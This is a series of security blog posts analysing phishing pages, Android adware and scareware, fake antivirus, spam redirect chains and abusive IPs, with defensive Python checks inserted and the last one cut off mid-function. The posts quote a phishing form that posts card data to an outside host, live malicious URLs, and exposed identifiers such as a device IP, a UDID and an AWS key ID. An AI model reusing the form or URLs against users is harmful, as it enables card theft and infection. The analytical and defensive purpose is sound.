5 June 2012, 17:12

 

 

Capture_paypal_050612.PNG

 

The malicious code is:

<form method="post" id="ccForm" action="http://mix4.top8.com/lol/coco-stor.php" name="ccForm" class="" onsubmit="return verif_formulaire()">

 

Not detected by most browsers: Opera, IE,....
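As an added example (not part of the original post), here is a small Python check for the pattern shown above: a form whose action posts to a domain other than the page it sits on. The page URL paypal-secure.example is an assumption; only the form tag comes from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> tag in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")


def origin_of(url):
    """(scheme, host) pair used to compare origins; host is lowercased."""
    parts = urlsplit(url)
    return parts.scheme.lower(), (parts.hostname or "").lower()


def cross_origin_forms(page_url, html):
    """Return the absolute action URLs of forms that submit outside the page's origin.

    Relative actions are resolved against page_url, so a form posting back to the
    same site is never flagged. A scheme change (https page, http action) counts as
    cross-origin, since the submitted credentials would leave the page's origin.
    """
    parser = FormActionCollector()
    parser.feed(html)
    page_origin = origin_of(page_url)
    return [
        urljoin(page_url, action)
        for action in parser.actions
        if origin_of(urljoin(page_url, action)) != page_origin
    ]


# Constructed sample: the form tag quoted above, embedded in a page that imitates
# PayPal. The page URL is an assumption; only the form tag comes from the post.
SAMPLE_PAGE_URL = "http://paypal-secure.example/login.html"
SAMPLE_HTML = """
<html><body>
<form method="post" id="ccForm" action="http://mix4.top8.com/lol/coco-stor.php"
      name="ccForm" class="" onsubmit="return verif_formulaire()">
  <input name="cc" type="text"><input type="submit" value="Continue">
</form>
<form method="get" action="/search"><input name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for target in cross_origin_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("form submits off-site to:", target)
```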

4 April 2012, 00:07

 

The mobile malware fashion (are we gonna call it mobalware someday?) seems to copy the regular malware one... maybe just a little bit faster.

 

Anyway, I was keen on an app aiming to improve the standard Android SMS reader/writer. The app is called ChompSMS. There is a free version and a paid version. I'm going to talk here about the free one.

 

One day, recently, I noticed the ad displayed while browsing the SMS had changed.

 

 Here are a few examples of the banners I find interesting:

 

batt_-banner1_chompSMS_annon.png

 

batt_banner2_ChomSMS_annon.png

 

 

batt_banner3_chompSMS_annon.png

 

 

See the banner right in the bottom of the screen?

So, if I click on it, the real part begins.

 

batt2.png

 

 

Obviously, I will not have the choice here... only the orange button ("next"). This is what I'm here for: let's click on it!

 

 

 batt_alert2_040412.png

 

The displayed instructions are worth reading :) everything is done to convince the user to download, install and activate whatever is going to be downloaded... and by the way, they also recommend enabling "unknown sources" for software...!

 

What about antivirus? Well, not bad on that one.

Webroot will indeed detect and alert:

webroot_alert1_040412.png 

And DrWeb will do the same:

 

drweb_alert1_040412.png 

Note that even the file name is carefully crafted: "battery_upgrade--tap_to_start", complete with a reminder: "tap to start"!

 

Now, where does this come from?

Let's watch the network traffic ChompSMS generates just after it has been opened/launched:

HTTP_trafic_CHompSMS_Ads_040412.png 

 Bingo, here is the real and complete ad URL:

http://www.mmnetwork.mobi/s.php?sig=5942e84d7db11dc54eda6157a3c2bc7a&adid=480&banner=320_50&cid=89&advid=846&e=c8&d=92888&f=m&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1

It will return the exact banner we have seen at the bottom of the ChompSMS screen just above.

But having a look at the URL reveals something else:

- OS version, generic:  value here is "linux" 

- OS version, detailed: Android 2.3.3

- local language: fr-fr

- build version: Gingerbread

- browser rendering engine: AppleWebkit, 533.1?

- browser compatibility: KHTML like Gecko version 4.0

- browser internal name: Mobile Safari,  533.1?

All I can say so far, beyond the fact that this is a real fingerprint of the device, is that it allows the ad (and the scareware) to target device configurations and be more effective.

Same thing for this other URL:

http://ads.mojiva.com/ad?site=14717&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1&ip=82.237.173.18&count=1&key=1&zone=19352&url=&premium=1&over_18=0&&udid=848053C87A05BDEB3EE36C8919CD4CD1&type=6  

 

Then, when we click, the ad system displays a first picture, as an ad:

http://admarvel.s3.amazonaws.com/ads/c46767/13307072869253_UNL_st2_480x600_FR_everything.gif

13307072869253_UNL_st2_480x600_FR_everything.gif 

 

And even a second one!

http://admarvel.s3.amazonaws.com/ads/c48174/13317172538745_LYRICPLAY_FR_480X600.gif

13317172538745_LYRICPLAY_FR_480X600.gif
 

Then the ad system will do something I guess to be a "call home":

http://107.22.117.140/fam/ck.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=0654201044__h=1333491475__uid=292b5557482687e4__s=7789be62e6c35a07fe085f54d7d9fe26

http://107.22.117.140/fam/view.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=c32f363568__h=1333491475__uid=292b5557482687e4__s=782405e716ee038035c5457a2cb05672

 

http://adserver.adtechus.com/addyn/3.0/5326.1/2335977/0/0/ADTECH;noperf=1;loc=100;ip=82.237.173.18;key=Samsung_Galaxy+S2;kvip=82.237.173.18;kvcarrier=;misc=1333492265028;target=_self;kvmedition=$edition;kvos=Android;sub1=99f50d6b93f7d3f36b56c4d082a57a135d92caf8;sub2=8ADD4216FF9A40854591929EB3BC02CC081EA2FE;sub3=6568cf499469dbc79707fba422cfd36f;sub4=848053C87A05BDEB3EE36C8919CD4CD1;
 

I can even see the mobile's IP address and the model (Galaxy S2)!
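The fields listed above can be pulled out automatically. This added Python example (not the blog's own code) parses the three ad URLs quoted in this post, extracts the User-Agent fingerprint and the device identifiers, and goes one step beyond the text by reporting which values the different ad networks share (the udid and ip appear under other parameter names on a second network).

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed copies of the three ad requests quoted above (values are the post's own).
AD_URLS = [
    "http://www.mmnetwork.mobi/s.php?sig=5942e84d7db11dc54eda6157a3c2bc7a&adid=480&banner=320_50&cid=89&advid=846&e=c8&d=92888&f=m&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1",
    "http://ads.mojiva.com/ad?site=14717&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1&ip=82.237.173.18&count=1&key=1&zone=19352&url=&premium=1&over_18=0&&udid=848053C87A05BDEB3EE36C8919CD4CD1&type=6",
    "http://adserver.adtechus.com/addyn/3.0/5326.1/2335977/0/0/ADTECH;noperf=1;loc=100;ip=82.237.173.18;key=Samsung_Galaxy+S2;kvip=82.237.173.18;kvcarrier=;misc=1333492265028;target=_self;kvmedition=$edition;kvos=Android;sub1=99f50d6b93f7d3f36b56c4d082a57a135d92caf8;sub2=8ADD4216FF9A40854591929EB3BC02CC081EA2FE;sub3=6568cf499469dbc79707fba422cfd36f;sub4=848053C87A05BDEB3EE36C8919CD4CD1;",
]

# Fields of the Android 2.x stock-browser User-Agent, as listed in the post.
UA_PATTERN = re.compile(
    r"Mozilla/5\.0 \((?P<os>[^;]+); U; Android (?P<android>[^;]+); (?P<locale>[^;]+); "
    r"(?P<model>\S+) Build/(?P<build>[^)]+)\) (?P<engine>AppleWebKit/[\d.]+) "
    r"\(KHTML, like Gecko\) (?P<browser>.+)$"
)


def parse_ad_params(url):
    """Return every key=value parameter of an ad URL as a dict of decoded strings.

    Handles the usual query string (?a=b&c=d) and the ADTECH style, where the
    parameters are ;-separated inside the path (/ADTECH;ip=...;key=...;).
    """
    parts = urlsplit(url)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    for segment in parts.path.split(";")[1:]:
        if "=" in segment:
            key, value = segment.split("=", 1)
            params[key] = unquote_plus(value)
    return params


def device_fingerprint(urls, min_len=8):
    """Merge the device details exposed by several ad requests into one profile.

    profile["shared"] maps each value (at least min_len chars, the User-Agent
    excluded) that appears on two or more different ad hosts to the (host, param)
    pairs carrying it: an opaque identifier shared across networks lets them
    correlate the same device.
    """
    profile = {}
    seen = {}
    for url in urls:
        host = urlsplit(url).hostname
        params = parse_ad_params(url)
        match = UA_PATTERN.match(params.get("ua", ""))
        if match:
            profile.update(match.groupdict())
        for key in ("ip", "udid"):
            if params.get(key):
                profile[key] = params[key]
        for key, value in params.items():
            if key != "ua" and len(value) >= min_len:
                seen.setdefault(value, set()).add((host, key))
    profile["shared"] = {
        value: sorted(places)
        for value, places in seen.items()
        if len({host for host, _ in places}) > 1
    }
    return profile


if __name__ == "__main__":
    for key, value in device_fingerprint(AD_URLS).items():
        print(f"{key}: {value}")
```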


Last, but not least, the download will start:

URL: https://s3.amazonaws.com/battery.supercharge/downloads/m--france--2012-03-28.a-en-9.apk?AWSAccessKeyId=AKIAIADYPOKA37DVGHGQ&Expires=1649026622&response-content-disposition=attachment;%20filename=Battery_Upgrade--Tap_to_Start.apk&response-content-type=application/vnd.android.package-archive&Signature=TZCWnCk5wbn%2BeoL1WCkcqfky3pw%3D

File name: /mnt/sdcard/.downloadTemp/Battery_Upgrade--Tap_to_Start.apk

 

About the file?

VirusTotal says 7 AV engines out of 42 detect it...

SHA1: afdf9c78e0e1bc41192664ba3040908c18d72a3a
MD5: 1e67b070accd8d71024f240504b59140
File size: 529.3 KB ( 541956 bytes )
File name: Battery_Upgrade--Tap_to_Start.apk
File type: Android
Detection ratio: 7 / 42
Analysis date: 2012-04-03 23:28:47 UTC

 

https://www.virustotal.com/file/6e129566f5139532c18779ae96c4f228a15d27032081d46f486ae029c4d6dce7/analysis/1333495727/

 

 More to come... 

11 January 2012, 01:12

I would believe we are back to the Win 9x era, when adware used to be legion (at least in proportion to the global threat trends of the time). But this case seems to concern any Android OS from 1.6 to 2.x, much more modern systems...

In a nutshell, this adware will:

- add an icon on the main screen of your phone, leading to a kind of "fake" Google search engine

- display ads in the top notification bar on a regular basis, suggesting you download (or rather pay for) new apps, thereby accessing the network over 3G

- remain active as a background service...

 

But what are we really talking about? This is all about a game: Helicopter Strike Force. See splashscreen of the game, while loading:

adware-heli-2012-01-11-005724-copie-1.png

 

Most of the installed AVs I've tested do not detect it:

- Norton (no screenshot available at the time of the test... :( )

- DrWeb 

drweb_device-2012-01-11-005326.png

- Webroot

webroot_device-2012-01-11-005205.png

- Kaspersky Lite 

KAV-OK-2012-01-11-011915.png

Note that KAV uses the "Kaspersky Security Network" to scan the app in the cloud before its first execution. Although I have installed (and uninstalled) the game twice, with several days between each install, the KSN did not find anything.

 

I even tried VirusTotal, but no real result. I'm wondering if the command line versions of AV engines that VT uses are able to use mobile-specific threat signatures.

 

But that's not all: this app also installs a service, which could be surprising for "just" a game...

app-service-2012-01-11-011009.png

 

 

Now here is the new icon on the main/first desktop:

accueil_device-2012-01-11-005348-copie-1.png

 

But the thing is, this search engine is not what you may think. When you launch it, it accesses livemobilesearch.com... which in turn does look like Google, but it's not!

Charge-recherch-2012-01-11-005628.png

Then:

recherch1-2012-01-11-005408.png

(bottom of page)

recherch2-2012-01-11-005420.png

 

You have to read the "privacy" link at the bottom of the page to confirm our expectations:

recherch-privacy-2012-01-11-005453.png

 

Last, but not least, the results this search engine provides do differ from Google's. For instance, the keyword "music" returns:

result-music-2012-01-11-011631.png

 

While the "real" Google says:

google_music_110112.PNG

 

Therefore I'd say that:

- yes, antimalware on smartphones is more and more needed. I suggest everybody tries one...

- as we have been saying for years about regular computers, be careful about the links you click and the apps you download...

 

 

Update 1, 01/15/12:

Let's see what's going on deeper within Android:

DebugMon_app-process-service_14012012-copie-1.png

 

It appears that "helicopterstrikeforce" launches 3 processes/services. One of them has an interesting name: noolah.pushnotification.

Searching Google for it returns the following PDF document:

https://docs.google.com/viewer?a=v&q=cache:JD8QLTJaokAJ:forum.unity3d.com/attachment.php%3Fattachmentid%3D22799%26d%3D1311396784+&hl=fr&pid=bl&srcid=ADGEESjCxeNBKAr8al8ucNN9aYNB4e14wcIVSyGps1m98N4V28LCbBDok2MP00DAuK67r-VGip0kMbnUuwTYdYn62PuEsyqCnLJqbpv-kaoOZymAxhzFJ1NVYqIFeQ-TNyrJYCT_A5np&sig=AHIEtbR8kCBOiQlmRSpvniyC5MzAMoFo7w

 

Pretty interesting too, as it explains the ad's implementation:

moolah1_15012012.png

moolah2_15012012.png

There we go: service android:name="com.moolah.NotificationService"!

 

Therefore, this acts as the adware component and remains active even if the game is not running.

Let's see the result:

 

apps-notification-full-2012-01-14-134438.png

 

"Android app offer", and "Live & work in the USA" are not related to the phone's own processes (or user's actions/RQ).

Here is an example of such advertised apps: once the user has clicked on it, he is redirected to a website like:

app1-2012-01-11-005544.png

 

Fortunately, this phone was using WiFi connectivity ATOW, but obviously WiFi does not work while roaming (I mean, walking in the street, for instance), so this ad will create extra (and most likely uncontrolled) data transfer over 3G!

 

If the mobile network operator charges for data in any way, those apps may become painful for people's credit cards. So pay attention whenever an app requires full Internet access at install time while that is not necessary for its type!

6 December 2011, 21:55

 

 

First I thought this was regular spam, something close to Viagra (and the like...). But in the end, no...

The contact told me his "mail account" had been stolen, whereas I do believe his computer has been compromised (and the bad guys then used that to gain access to the email account...).

msg_Gmail.JPG

 

But when I clicked on it, surprise... The real URL is:

http://bessthoprapi2iad .vv.cc/2i3xuqg42.jsp.

But this will in fact redirect the user to:

http://87.255.77. 35/fw2.pl

 

Then a new redirection: http://dsdss333 .coom.in/dng311011/a90c83a2e63449deddcf99e0660d9f73/spl.php (detected by KAV 2011, but apparently this is not effective enough to block the infection).

 

Under IE9, here is what happens:

 msg1_IE9_egorest.co.in.jpg

 

 

If I click on Yes, it goes:

scan1_IE9_egorest.co.in.jpg

 

Then...

 

scan2_IE9_egorest.co.in.jpg

 

Quite regular now: even if I click "Cancel", a file download is attempted, still in a regular way:

 

file_egorest.co.in.JPG

 

 

IE 9 then tries to warn me that the file "is not downloaded very often, and could be harmful"...:

 

msg_file_IE9_egorest.co.in-copie-1.JPG

 

 

 

KAV 2011 does not detect the sample. Neither does Malwarebytes.

 

VirusTotal's results are quite clear! Only 2 engines out of 41...!

 

Antivirus Version Last Update Result
AhnLab-V3 2011.12.06.01 2011.12.06 -
AntiVir 7.11.19.2 2011.12.06 -
Antiy-AVL 2.0.3.7 2011.12.06 -
Avast 6.0.1289.0 2011.12.06 -
AVG 10.0.0.1190 2011.12.06 -
BitDefender 7.2 2011.12.06 -
ByteHero 1.0.0.1 2011.11.29 -
CAT-QuickHeal 12.00 2011.12.06 -
ClamAV 0.97.3.0 2011.12.06 -
Commtouch 5.3.2.6 2011.12.06 -
Comodo 10859 2011.12.06 -
DrWeb 5.0.2.03300 2011.12.06 -
Emsisoft 5.1.0.11 2011.12.06 -
eSafe 7.0.17.0 2011.12.06 -
eTrust-Vet 37.0.9607 2011.12.06 -
F-Prot 4.6.5.141 2011.11.29 -
F-Secure 9.0.16440.0 2011.12.06 -
Fortinet 4.3.388.0 2011.12.06  W32/Kryptik.TAF!tr
GData 22 2011.12.06 -
Ikarus T3.1.1.109.0 2011.12.06 -
Jiangmin 13.0.900 2011.12.06 -
K7AntiVirus 9.119.5608 2011.12.06 -
Kaspersky 9.0.0.837 2011.12.06 -
McAfee 5.400.0.1158 2011.12.06 -
McAfee-GW-Edition 2010.1D 2011.12.06 -
Microsoft 1.7903 2011.12.06 -
NOD32 6681 2011.12.04 -
Norman 6.07.13 2011.12.06  W32/Kazy.NA
nProtect 2011-12-06.01 2011.12.06 -
Panda 10.0.3.5 2011.12.06 -
PCTools 8.0.0.5 2011.12.06 -
Prevx 3.0 2011.12.06 -
Rising 23.87.01.02 2011.12.06 -
Sophos 4.71.0 2011.12.06 -
SUPERAntiSpyware 4.40.0.1006 2011.12.06 -
Symantec 20111.2.0.82 2011.12.06 -
TheHacker 6.7.0.1.352 2011.12.01 -
TrendMicro 9.500.0.1008 2011.12.06 -
TrendMicro-HouseCall 9.500.0.1008 2011.12.06 -
VBA32 3.12.16.4 2011.12.06 -
VIPRE 11212 2011.12.06 -
ViRobot 2011.12.6.4811 2011.12.06 -
VirusBuster 14.1.102.0 2011.12.06 -
MD5: c7fa7ebcb697b26ac684f8b18a0f30b4
SHA1: 98561e513580021bbd2f715e54a53e96558a8a1f
SHA256: bc9264cd51df7815a96c0753cbacbde9f2f491a191b78a06782854abb93171f4
File size: 129536 bytes
Scan date: 2011-12-06 21:48:09 (UTC)

 

About the file:

I also find it interesting to mention that the exe file is in fact made of pure MS technology: Silverlight.

 

 

file_properties.jpg

 

Update 1:

When run on a fully-patched Win 7 x64, nothing really bad happens... it seems that an additional download fails.

This is also what ThreatExpert tells about the file's execution history:

http://www.threatexpert.com/report.aspx?md5=c7fa7ebcb697b26ac684f8b18a0f30b4 

Buggy malware?

 

9 November 2011, 01:32

 

This malware did succeed in installing itself on the following configuration:

- Win7 64 bits, fully-patched

- KAV 2011

- user account not administrator (account switching using UAC)

- Opera 11.52 up-to-date

I was just surfing... Therefore I do believe it is a kind of drive-by download.

 

Once installed, it will:

- kill all programs running (yes!), including a lot of services (sometimes KAV's service too)

- prevent you from launching new/other programs

- display a fake shield within the taskbar...

 

 Here is how it starts itself at the beginning of the user's session:  

registre_HKU_privacy.exe.jpg

 The Sysinternals tool "autoruns" does not show it, AFAIK.

 

According to VirusTotal, only 3 AV engines out of 43 (command line versions) detect it!

(link: http://www.virustotal.com/file-scan/report.html?id=c6d83ab1348c548b7581153100b8b7eb7c1b89b3e753151594828c2ac78f2c12-1320798644# )

 

Kaspersky Antivirus 2011 does not detect anything. 

Malwarebytes does detect something, but the problem is you can't start it once the malware is running...

 

MBAM_privacy.exe_091111.png

 

 

As you can see, the malware stores a file in %appdata%, so that's AppData\Roaming for the current user.

 

One hour after my first scan, VT says 3 new engines detect it:

Antivirus Version Last Update Result
AhnLab-V3 2011.11.08.01 2011.11.08 -
AntiVir 7.11.17.87 2011.11.08 -
Antiy-AVL 2.0.3.7 2011.11.08 -
Avast 6.0.1289.0 2011.11.08 -
AVG 10.0.0.1190 2011.11.08 -
BitDefender 7.2 2011.11.09 -
ByteHero 1.0.0.1 2011.11.04 -
CAT-QuickHeal 11.00 2011.11.08 -
ClamAV 0.97.3.0 2011.11.08 -
Commtouch 5.3.2.6 2011.11.08 -
Comodo 10714 2011.11.08 -
DrWeb 5.0.2.03300 2011.11.09 -
Emsisoft 5.1.0.11 2011.11.09 Trojan.Win32.Agent.AMN!A2
eSafe 7.0.17.0 2011.11.08 -
eTrust-Vet 36.1.8663 2011.11.08 -
F-Prot 4.6.5.141 2011.11.08 -
F-Secure 9.0.16440.0 2011.11.09 -
Fortinet 4.3.370.0 2011.11.08 -
GData 22 2011.11.09 -
Ikarus T3.1.1.109.0 2011.11.08 -
Jiangmin 13.0.900 2011.11.08 -
K7AntiVirus 9.117.5413 2011.11.08 -
Kaspersky 9.0.0.837 2011.11.09 -
McAfee 5.400.0.1158 2011.11.09 Artemis!61E2511F79EF
McAfee-GW-Edition 2010.1D 2011.11.08 Artemis!61E2511F79EF
Microsoft 1.7801 2011.11.08 -
NOD32 6612 2011.11.08 a variant of Win32/Kryptik.SES
Norman 6.07.13 2011.11.08 W32/Krypt.BD
nProtect 2011-11-08.01 2011.11.08 -
Panda 10.0.3.5 2011.11.08 -
PCTools 8.0.0.5 2011.11.09 -
Prevx 3.0 2011.11.09 -
Rising 23.83.01.01 2011.11.08 -
Sophos 4.71.0 2011.11.09 Mal/FakeAV-PG
SUPERAntiSpyware 4.40.0.1006 2011.11.09 -
Symantec 20111.2.0.82 2011.11.09 -
TheHacker 6.7.0.1.339 2011.11.08 -
TrendMicro 9.500.0.1008 2011.11.08 -
TrendMicro-HouseCall 9.500.0.1008 2011.11.09 -
VBA32 3.12.16.4 2011.11.08 -
VIPRE 11001 2011.11.09 -
ViRobot 2011.11.8.4761 2011.11.08 -
VirusBuster 14.1.53.1 2011.11.08 -
MD5 : 61e2511f79ef738d73d766c0ab8c8c1a

 

Most of these detections are heuristic/generic ones!

I've submitted a sample to ClamAV.

 

About the file:

fichier_proprietes_091111.jpg 

There is even a copyright notice on it...

 

1 November 2011, 21:27

I just found out that one of my NIPS reports seems pretty clear regarding the daily top alerts:

alert_NIPS_65.98.36.50.JPG

 

For those who forgot to secure their (Open)SSH server a little bit, time's running...

What about that IP address 65.98.36.50? Well, it is the reverse DNS pointer of http://argi9cure.com/.

Just have a look at it: CentOS default webpage! :( And above all, Apache 2.2.3, most likely obsolete.

 

Quite interesting, what (McAfee) TrustedSource says about it:

 

trustedsource.org_65.98.36.50.JPG

 

So not only are massive SSH session attempts being launched from that server, but its mail volume (as a sender) has drastically changed, growing by 500%!

Another compromised server being used to spam stealthily, huh?

Furthermore, this IP address has also been reported in DShield's stats:

http://www.dshield.org/ipinfo.html?ip=65.98.36.50&update=yes

This once again shows the relevance of IP reputation based filtering.

 

30 October 2011, 22:52

While browsing the web, I was surprised to see KAV 2011 raise an alert when accessing a site (trojanedbinaries.com). Here is the full message:

alerte_trojanedbinaries.com_rss_301011.JPG

So let's analyse the meaning of the message, through the detection name:

- HEUR for Heuristic, most likely.

- Exploit, as its name suggests?

- Script.Generic, for a script detection?

I am afraid KAV is mistaken: submitting the URL to VT gives rather reassuring results:

http://www.virustotal.com/url-scan/report.html?id=b222631fa7d0b88d67c630272c3c9690-1320007826

URL Analysis tool Result
Avira Clean site
BitDefender Clean site
Dr.Web Error
G-Data Clean site
Malc0de Database Clean site
MalwareDomainList Clean site
Opera Clean site
ParetoLogic Clean site
Phishtank Clean site
TrendMicro Unrated site
Websense ThreatSeeker Unrated site
Wepawet Unrated site
Normalized URL: http://trojanedbinaries.com/blog/?feed=rss2//trojanedbinaries
URL MD5: b222631fa7d0b88d67c630272c3c9690

 

In short, if the file name alone is enough for KAV to block it, the false-positive risk seems real to me.

Solution: never "delete" detected objects directly, but always quarantine them for later inspection!

14 October 2011, 01:15

 

The sample speaks for itself:

email.JPG

Using a Gmail account as the contact point for an "Orange" promotion seems absurd. At worst, a Wanadoo address might already have confused the "new Internet users"...

And to top it off, the message is sent from the (fake) address contact@free.fr! That mixes everything up!

Needless to say, I recommend neither writing to them nor sending them an SMS...

---------------------------------------------------------------------------

Regarding the phone number 81168, it appears on other sites, not necessarily very clear/reputable ones, such as:

http://www.hacker-msn.org/hacker-msn/

http://www.hack-paradize.net/products/sms.aspx

http://hacker-dofus.net/generer-des-kamas.html

always with the same keyword "STAR"...

----------------------------------------------------------------------------

Regarding the server that sent the email, 91.122.206.1: it is reported by 21 Internet blacklists as of 14/10!

See: http://ip-blacklist.e-dns.org/91.122.206.1

 Warning! This IP is listed in 21 DNS blacklists.

LISTED 30ms 510 Software Group Blackholes
LISTED 31ms APEWS Level 2
LISTED 30ms Barracuda Reputation Block List
LISTED 30ms Barracuda Reputation Block List (for SpamAssassin)
LISTED 30ms CBL
LISTED 94ms D. D. N. S. B. L.
LISTED 38ms nsZones.com Dyn
LISTED 38ms nsZones.com SBL+Dyn
LISTED 134ms no-more-funn
LISTED 30ms SORBS Aggregate zone (problems)
LISTED 30ms SORBS Spamhost (any time)
LISTED 30ms SORBS Spamhost (last year)
LISTED 70ms SpamCop Blocking List
LISTED 30ms SpamRATS! all
LISTED 57ms Spamhaus ZEN Combined Block List
LISTED 76ms SpamRATS! Dyna
LISTED 106ms Spamhaus XBL Exploits Block List
LISTED 151ms Spamhaus SBL-XBL Combined Block List
LISTED 30ms GBUdb Truncate
LISTED 30ms UCEPROTECT Level 2
LISTED 30ms UCEPROTECT Level 3
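As an added Python example (not from the post) of the lookup behind such a listing, and of the IP reputation check the 1 November post relies on: the query name is the reversed IP under the DNSBL zone, and the answer code tells whether and why the address is listed. The zone names and the Spamhaus ZEN return codes are quoted from memory, not from the post, and the resolver is pluggable so the check can be exercised offline.

```python
import socket
from ipaddress import IPv4Address

# Zones queried: assumed names of three of the lists above (from memory, not from the post).
ZONES = ("zen.spamhaus.org", "bl.spamcop.net", "b.barracudacentral.org")

# Meaning of the A record Spamhaus ZEN returns (its published codes, quoted from memory).
ZEN_CODES = {
    "127.0.0.2": "SBL (spam source)",
    "127.0.0.3": "CSS (snowshoe spam source)",
    "127.0.0.4": "XBL (exploited or infected host)",
    "127.0.0.5": "XBL (exploited or infected host)",
    "127.0.0.6": "XBL (exploited or infected host)",
    "127.0.0.7": "XBL (exploited or infected host)",
    "127.0.0.10": "PBL (end-user / dynamic range)",
    "127.0.0.11": "PBL (end-user / dynamic range)",
}


def dnsbl_name(ip, zone):
    """Query name for ip in zone: octets reversed, then the zone
    (91.122.206.1 in zen.spamhaus.org -> 1.206.122.91.zen.spamhaus.org)."""
    octets = str(IPv4Address(ip)).split(".")  # raises ValueError on a bad address
    return ".".join(reversed(octets)) + "." + zone


def system_resolver(name):
    """Resolve name with the system resolver; None means NXDOMAIN, i.e. not listed."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def classify_answer(answer):
    """Interpret a DNSBL answer: 127.0.0.x means listed; 127.255.x.x means the zone
    refused the query (blocked public resolver, query limit) and must not count as a hit."""
    if answer is None:
        return "not listed", None
    if answer.startswith("127.255."):
        return "error", answer
    if answer.startswith("127."):
        return "listed", answer
    return "unexpected", answer  # wildcard or hijacked NXDOMAIN: treat as unknown


def check_ip(ip, zones=ZONES, resolve=system_resolver):
    """Return {zone: (status, detail)}; detail names the ZEN sub-list when known."""
    results = {}
    for zone in zones:
        status, answer = classify_answer(resolve(dnsbl_name(ip, zone)))
        if status == "listed" and zone == "zen.spamhaus.org":
            answer = ZEN_CODES.get(answer, answer)
        results[zone] = (status, answer)
    return results


def listing_count(results):
    """Number of zones that actually list the address (errors are not counted)."""
    return sum(1 for status, _ in results.values() if status == "listed")


if __name__ == "__main__":
    # Live lookup of the sender quoted above; needs network access and a non-public resolver.
    for zone, (status, detail) in check_ip("91.122.206.1").items():
        print(f"{zone}: {status} {detail or ''}")
```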

17 September 2011, 00:23
To those who believe the Russian web tends to be safer, please first read Kaspersky's threat report for Q2 2011.

Then, have a look at the following.
 
Here is the mail I received (14th of September):
mail_gyuntere.ru_170911.jpg
The contact who sent this email is most likely to have a compromised computer.
 
The URL to be spread is:
It is not even hidden (like displaying a different URL between the source code and the rendered HTML).

As you can see, it is a WordPress-powered website (the "wp-content" part of the URL).

But the funny thing is the message displayed on this webpage:
 
You are here because one of your friends have invited you
to try our free trial.
Hurry up! Limited quantity available!
We try to be helpful for you.
Page loading, please wait....
 
 
Then there is an automatic redirection in the source code. The simplest way:
<meta http-equiv="refresh" content="4; url=http://gyuntere.ru">
 
 
Now, what does Netcraft say about this website?
netcraft_url_170911.jpg
Hosted in Romania, while the ccTLD is Russia (.ru).

And last, the "real" webpage, whose content is likely related to "male enhancement"... hum.
 
site_170911.jpg
 
Netcraft's risk rating bar is red, but no warning while accessing the website.
And yes, Nginx is also used to serve "spam related" websites...

============================
Update 1:

More about the "bouncing" server:
It seems that the whole folder
http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/
has been compromised, since there are a lot of files with kind of random names, and most of them contain a message like:
"You are here because one of your friends have invited you."

bounce_srv_files_170911.jpg

But what I find most interesting is that almost each of those files seems to contain a different redirection URL!

A few examples:
- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/1111.htm
-> http:///caretabgalaxy.com/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/domvkf.htm
-> http:///wikimedicare.com/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/dttnba.htm
-> http:///gyuntere.ru/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/mmarfd.htm
-> http:///ommatorepillstablets.net/

And BTW, the same scenario seems to happen on another website:
http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/

Thus we have:
- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/crsrtfh.htm
-> http:///carepillhealth.com/

- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/1111.htm
-> http:///caretabgalaxy.com/

- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/aaa.htm
-> http:///counterpunchdietmeds.com/

It looks like a real global spam campaign, taking advantage of compromised websites running WordPress, to fool antispam/URL filters and spread over the Internet...
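As an added Python example (not code from the post), here is the triage script one would run over such a compromised folder: it extracts the meta refresh target of every .htm page and groups the files by destination domain, so the whole redirect fan-out is visible at once. The folder contents are constructed from the file names and targets quoted above; the page bodies are made up.

```python
import os
import re
import tempfile
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The lure sentence seen in the bounce pages (compared case-insensitively).
LURE = "one of your friends have invited you"


class RefreshFinder(HTMLParser):
    """Extract the target of the first <meta http-equiv="refresh" content="N; url=..."> tag."""

    def __init__(self):
        super().__init__()
        self.delay = None
        self.target = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta" or self.target is not None:
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
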